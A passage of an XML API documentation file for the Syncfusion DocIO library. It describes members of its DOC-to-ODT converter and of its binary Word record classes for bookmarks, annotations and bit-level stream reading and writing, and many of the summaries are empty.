            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ODTConvertion.DocToODTConverter.GetListLevelAlingment(Syncfusion.DocIO.DLS.ListNumberAlignment)">
            <summary>
            Gets the list level text alignment
            </summary>
            <param name="numberAlignment"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ODTConvertion.DocToODTConverter.ConvertPageLayOut(Syncfusion.DocIO.DLS.WPageSetup,ODF.Base.ODFImplementation.PageLayout,ODF.Base.ODFImplementation.MasterPage)">
            <summary>
            Converts the WPageSetup to PageLayout properties
            </summary>
            <param name="pageSetup">The Page setup</param>
            <param name="layout">The Page layout</param>
            <param name="masterPage">The Master page</param>
        </member>
        <member name="P:Syncfusion.DocIO.ODTConvertion.DocToODTConverter.IsWritingHeaderFooter">
            <summary>
            Gets/Sets the value to denote the writer is writing header footer contents
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.AnnotationDescriptor">
            <summary>
            Summary description for AnnotationReferenceDescriptor.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.AnnotationDescriptor.m_xstUsrInitl">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.AnnotationDescriptor.m_ibst">
            <summary>
            Index into GrpXstAtnOwners
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.AnnotationDescriptor.m_ak">
            <summary>
            Unused
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.AnnotationDescriptor.m_grfbmc">
            <summary>
            Unused
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.AnnotationDescriptor.m_lTagBkmk">
            <summary>
            when not -1, this tag identifies the annotation bookmark that 
            locates the range of CPs in the main document which this annotation references.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.AnnotationDescriptor.#ctor(System.IO.BinaryReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.AnnotationDescriptor.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.AnnotationDescriptor.Read(System.IO.BinaryReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.AnnotationDescriptor.Write(System.IO.BinaryWriter)">
            <summary>
            
            </summary>
            <param name="writer"></param>   
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.AnnotationDescriptor.IndexToGrpOwner">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.AnnotationDescriptor.UserInitials">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.AnnotationDescriptor.Ak">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.AnnotationDescriptor.Grfbmc">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.AnnotationDescriptor.TagBkmk">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.BinaryTable">
            <summary>
            Summary description for BinaryTable.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord">
            <summary>
            Base class for all records in Word document.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.DEF_BITS_IN_BYTE">
            <summary>
            Number of bits in byte.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.DEF_BITS_IN_SHORT">
            <summary>
            Number of bits in short.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.DEF_BITS_IN_INT">
            <summary>
            Number of bits in int.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.#ctor(System.Byte[])">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord"/> class.
            </summary>
            <param name="data">The data.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.#ctor(System.Byte[],System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord"/> class.
            </summary>
            <param name="arrData">The arr data.</param>
            <param name="iOffset">The i offset.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.#ctor(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord"/> class.
            </summary>
            <param name="arrData">The arr data.</param>
            <param name="iOffset">The i offset.</param>
            <param name="iCount">The i count.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.#ctor(System.IO.Stream,System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord"/> class.
            </summary>
            <param name="stream">The stream.</param>
            <param name="iCount">The i count.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.GetBit(System.Byte,System.Int32)">
            <summary>
            Returns value of the single bit from byte.
            </summary>
            <param name="btOptions">Byte to get bit value from.</param>
            <param name="bitPos">Bit index.</param>
            <returns>Value of the single bit from byte.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.GetBit(System.Int16,System.Int32)">
            <summary>
            Returns value of the single bit from byte.
            </summary>
            <param name="sOptions">Int16 to get bit value from.</param>
            <param name="bitPos">Bit index.</param>
            <returns>Value of the single bit from byte.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.GetBit(System.Int32,System.Int32)">
            <summary>
            Returns value of the single bit from byte.
            </summary>
            <param name="iOptions">Byte to get bit value from.</param>
            <param name="bitPos">Bit index.</param>
            <returns>Value of the single bit from byte.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.GetBitsByMask(System.Int32,System.Int32,System.Int32)">
            <summary>
            Gets the bits by mask.
            </summary>
            <param name="value">The value.</param>
            <param name="BitMask">The bit mask.</param>
            <param name="iStartBit">The i start bit.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.GetBitsByMask(System.UInt32,System.Int32,System.Int32)">
            <summary>
            Gets the bits by mask.
            </summary>
            <param name="value">The value.</param>
            <param name="BitMask">The bit mask.</param>
            <param name="iStartBit">The i start bit.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.SetBit(System.Int32,System.Int32,System.Boolean)">
            <summary>
            Sets the bit.
            </summary>
            <param name="iValue">The i value.</param>
            <param name="bitPos">The bit pos.</param>
            <param name="value">if set to <c>true</c> [value].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.SetBitsByMask(System.Int32,System.Int32,System.Int32)">
            <summary>
            Sets value with all bits that correspond to the specified
            mask to zero to the same values as in value.
            </summary>
            <param name="destination">Variable that bits of which will be set.</param>
            <param name="BitMask">Bit mask.</param>
            <param name="value">Value from which bit values will be taken.</param>
            <returns>Value after set operation.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.SetBitsByMask(System.Int32,System.Int32,System.Int32,System.Int32)">
            <summary>
            Sets the bits by mask.
            </summary>
            <param name="destination">The destination.</param>
            <param name="BitMask">The bit mask.</param>
            <param name="iStartBit">The i start bit.</param>
            <param name="value">The value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.SetBitsByMask(System.UInt32,System.Int32,System.Int32)">
            <summary>
            Sets value with all bits that correspond to the specified
            mask to zero to the same values as in value.
            </summary>
            <param name="destination">Variable that bits of which will be set.</param>
            <param name="BitMask">Bit mask.</param>
            <param name="value">Value from which bit values will be taken.</param>
            <returns>Value after set operation.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.GetBit(System.UInt32,System.Int32)">
            <summary>
            Gets the bit.
            </summary>
            <param name="uiOptions">The UI options.</param>
            <param name="bitPos">The bit pos.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.SetBit(System.UInt32,System.Int32,System.Boolean)">
            <summary>
            Sets one bit in specified Int32.
            </summary>
            <param name="uiValue">Int32 to set bit.</param>
            <param name="bitPos">Bit position in the byte</param>
            <param name="value">Value of bit</param>
            <exception cref="T:System.ArgumentOutOfRangeException">
            If bitPos is less than zero or more than 7
            </exception>
            <returns>Value after</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.ReadUInt16(System.IO.Stream)">
            <summary>
            Reads UInt16 value from the stream.
            </summary>
            <param name="stream">Stream to read value from.</param>
            <returns>Read value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.ReadUInt32(System.IO.Stream)">
            <summary>
            Reads UInt32 value from the stream.
            </summary>
            <param name="stream">Stream to read value from.</param>
            <returns>Read value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.ReadInt16(System.IO.Stream)">
            <summary>
            Reads UInt16 value from the stream.
            </summary>
            <param name="stream">Stream to read value from.</param>
            <returns>Read value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.ReadInt32(System.IO.Stream)">
            <summary>
            Reads UInt32 value from the stream.
            </summary>
            <param name="stream">Stream to read value from.</param>
            <returns>Read value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.ReadUInt16(System.Byte[],System.Int32)">
            <summary>
            Gets UInt16 value from the array.
            </summary>
            <param name="arrData">Array of bytes to get value from.</param>
            <param name="iOffset">Offset of the UInt16 value.</param>
            <returns>UInt16 value read from array.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.ReadUInt16(System.Byte[],System.Int32@)">
            <summary>
            Gets UInt16 value from the array and moves position.
            </summary>
            <param name="arrData">Array of bytes to get value from.</param>
            <param name="iOffset">Offset of the UInt16 value.</param>
            <returns>UInt16 value read from array.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.ReadString(System.IO.Stream)">
            <summary>
            Reads the string.
            </summary>
            <param name="stream">The stream.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.WriteString(System.IO.Stream,System.String)">
            <summary>
            Writes the string.
            </summary>
            <param name="stream">The stream.</param>
            <param name="str">The STR.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.ReadString(System.Byte[],System.Int32)">
            <summary>
            Gets string from array of bytes.
            </summary>
            <param name="arrData">Array with string data.</param>
            <param name="iOffset">Offset to the string data.</param>
            <returns>String that was extracted from the array.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.ReadString(System.Byte[],System.Int32,System.UInt16)">
            <summary>
            Reads the string.
            </summary>
            <param name="arrData">The arr data.</param>
            <param name="iOffset">The i offset.</param>
            <param name="usCount">The us count.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.GetZeroTerminatedString(System.Byte[],System.Int32,System.Int32@)">
            <summary>
            Gets the zero terminated string.
            </summary>
            <param name="arrData">The arr data.</param>
            <param name="iOffset">The i offset.</param>
            <param name="iEndPos">The i end pos.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.ToZeroTerminatedArray(System.String)">
            <summary>
            Toes the zero terminated array.
            </summary>
            <param name="str">The sting.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.WriteUInt16(System.Byte[],System.UInt16,System.Int32@)">
            <summary>
            Writes the U int16.
            </summary>
            <param name="arrData">The arr data.</param>
            <param name="usValue">The us value.</param>
            <param name="iOffset">The i offset.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.WriteUInt32(System.Byte[],System.UInt32,System.Int32@)">
            <summary>
            Writes the U int32.
            </summary>
            <param name="arrData">The arr data.</param>
            <param name="uintValue">The uint value.</param>
            <param name="iOffset">The i offset.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.WriteUInt32(System.IO.Stream,System.UInt32)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.WriteInt32(System.IO.Stream,System.Int32)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.WriteInt16(System.IO.Stream,System.Int16)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.WriteUInt16(System.IO.Stream,System.UInt16)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.WriteString(System.Byte[],System.String,System.Int32@)">
            <summary>
            
            </summary>
            <param name="arrData"></param>
            <param name="strValue"></param>
            <param name="iOffset"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.WriteBytes(System.Byte[],System.Byte[],System.Int32)">
            <summary>
            Copy array of bytes to target array 
            and changes iOffset parameter.
            </summary>
            <param name="arrData"></param>
            <param name="bytes"></param>
            <param name="iOffset"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.ReadBytes(System.IO.Stream,System.Int32)">
            <summary>
            Reads the bytes.
            </summary>
            <param name="stream">The stream.</param>
            <param name="i">The i.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.Parse(System.Byte[])">
            <summary>
            Parses record.
            </summary>
            <param name="data">Data to parse.</param>    
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.Parse(System.Byte[],System.Int32)">
            <summary>
            Parses record.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset in the data array to the records data.</param>    
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.Parse(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Parses the specified arr data.
            </summary>
            <param name="arrData">The arr data.</param>
            <param name="iOffset">The i offset.</param>
            <param name="iCount">The i count.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.Parse(System.IO.Stream,System.Int32)">
            <summary>
            Parses the specified stream.
            </summary>
            <param name="stream">The stream.</param>
            <param name="iCount">The i count.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the specified arr data.
            </summary>
            <param name="arrData">The arr data.</param>
            <param name="iOffset">The i offset.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.Save(System.IO.Stream)">
            <summary>
            Saves the specified stream.
            </summary>
            <param name="stream">The stream.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.Length">
            <summary>
            Gets the length.
            </summary>
            <value>The length.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BaseWordRecord.UnderlyingStructure">
            <summary>
            Gets the underlying structure.
            </summary>
            <value>The underlying structure.</value>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BinaryTable.m_arrFC">
            <summary>
            Array of file positions (n+1).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BinaryTable.m_arrEntry">
            <summary>
            Array of talbe entries (n).
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BinaryTable.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BinaryTable.#ctor(System.Byte[])">
            <summary>
            
            </summary>
            <param name="arrData"></param>
            <param name="converter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BinaryTable.#ctor(System.IO.Stream,System.Int32)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="iCount"></param>
            <param name="converter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BinaryTable.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BinaryTable.Parse(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Parses the specified data.
            </summary>
            <param name="arrData">The data.</param>
            <param name="iOffset">The offset.</param>
            <param name="iLength">Length.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BinaryTable.Save(System.Byte[],System.Int32)">
            <summary>
            Saves record into array of bytes.
            </summary>
            <param name="arrData">Array of bytes to save record into.</param>
            <param name="iOffset">Offset in the array.</param>
            <returns>Number of bytes in the written data.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BinaryTable.FileCharacterPos">
            <summary>
            Returns array of character positions. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BinaryTable.Entries">
            <summary>
            Returns array of binary table entries. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BinaryTable.EntriesCount">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BinaryTable.Length">
            <summary>
            Returns number of bytes needed to store record in a stream or in an array.
            Read-only.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor">
            <summary>
            Summary description for BookmarkFirstDescriptor.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.DEF_STRUCT_SIZE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.m_bkmkCount">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.m_bkfArr">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.m_bklArr">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.m_lastEnd">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.#ctor(System.IO.Stream,System.Int32,System.Int32,System.Int32,System.Int32,System.Int32)">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.GetBeginPos(System.Int32)">
            <summary>
            
            </summary>
            <param name="i"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.SetBeginPos(System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="i"></param>
            <param name="position"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.GetEndPos(System.Int32)">
            <summary>
            
            </summary>
            <param name="i"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.SetEndPos(System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="i"></param>
            <param name="position"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.Save(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Fib,System.UInt32)">
            <summary>
            Saves the specified stream.
            </summary>
            <param name="stream">The stream.</param>
            <param name="fib">The fib.</param>
            <param name="endChar">The end character.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.Add(System.Int32)">
            <summary>
            
            </summary>
            <param name="startPos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.IsCellGroup(System.Int32)">
            <summary>
            Determines whether specified bookmark covers a group of table cells.
            </summary>
            <param name="bookmarkIndex">Index of the bookmark.</param>
            <returns>
            	<c>true</c> if [is column group] returns true; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.SetCellGroup(System.Int32,System.Boolean)">
            <summary>
            Sets specified bookmark covers a group of table cells.
            </summary>
            <param name="bookmarkIndex">Index of the bookmark.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.GetStartCellIndex(System.Int32)">
            <summary>
            Gets the start index of the cell which is covered by the bookmark.
            </summary>
            <param name="bookmarkIndex">Index of the bookmark.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.SetStartCellIndex(System.Int32,System.Int32)">
            <summary>
            Sets the start index of the cell bookmark.
            </summary>
            <param name="bookmarkIndex">Index of the bookmark.</param>
            <param name="position">The position.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.GetEndCellIndex(System.Int32)">
            <summary>
            Gets the end index of the cell which is covered by the bookmark.
            </summary>
            <param name="bookmarkIndex">Index of the bookmark.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.SetEndCellIndex(System.Int32,System.Int32)">
            <summary>
            Sets the end index of the cell bookmark.
            </summary>
            <param name="bookmarkIndex">Index of the bookmark.</param>
            <param name="position">The position.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.ReadBKL(System.Int32,System.IO.Stream,System.Int32)">
            <summary>
            
            </summary>
            <param name="bklPos"></param>
            <param name="stream"></param>
            <param name="bklLength"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.ReadBKF(System.Int32,System.IO.Stream,System.Int32)">
            <summary>
            
            </summary>
            <param name="bkfPos"></param>
            <param name="stream"></param>
            <param name="bkfLength"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.WriteBKF(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Fib,System.UInt32)">
            <summary>
            Writes the BKF.
            </summary>
            <param name="stream">The stream.</param>
            <param name="fib">The fib.</param>
            <param name="endChar">The end character.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.WriteBKL(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Fib,System.UInt32)">
            <summary>
            Writes the BKL.
            </summary>
            <param name="stream">The stream.</param>
            <param name="fib">The fib.</param>
            <param name="endChar">The end character.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.BookmarkCount">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkDescriptor.BkfArray">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkInfo">
            <summary>
            Summary description for Bookmark.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkInfo.m_strName">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkInfo.m_iStartPos">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkInfo.m_iEndPos">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkInfo.m_isCellGroup">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkInfo.m_startCell">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkInfo.m_endCell">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkInfo.m_bookmarkIndex">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkInfo.#ctor(System.String,System.Int32,System.Int32,System.Boolean,System.Int16,System.Int16)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkInfo"/> class.
            </summary>
            <param name="name">The name.</param>
            <param name="startPos">The start pos.</param>
            <param name="endPos">The end pos.</param>
            <param name="isCellGroup">if set to <c>true</c> [is cell group].</param>
            <param name="startCellIndex">Start index of the cell.</param>
            <param name="endCellIndex">End index of the cell.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkInfo.Clone">
            <summary>
            Clones current BookmarkInfo object.
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkInfo.Name">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkInfo.EndPos">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkInfo.StartPos">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkInfo.IsCellGroupBookmark">
            <summary>
            Determines whether specified bookmark covers a group of table cells .
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkInfo.StartCellIndex">
            <summary>
            Gets the start index of the cell which is covered by the bookmark.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkInfo.EndCellIndex">
            <summary>
            Gets the end index of the cell which is covered by the bookmark.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkInfo.Index">
            <summary>
            Bookmark index in the collection of bookmarks.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkNameStringTable">
            <summary>
            Summary description for BookmarkNameRecord.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkNameStringTable.m_strArr">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkNameStringTable.m_bkmkCount">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkNameStringTable.#ctor(System.IO.Stream,System.Int32)">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkNameStringTable.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkNameStringTable"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkNameStringTable.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.BookmarkNameStringTable.Save(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            
            </summary>
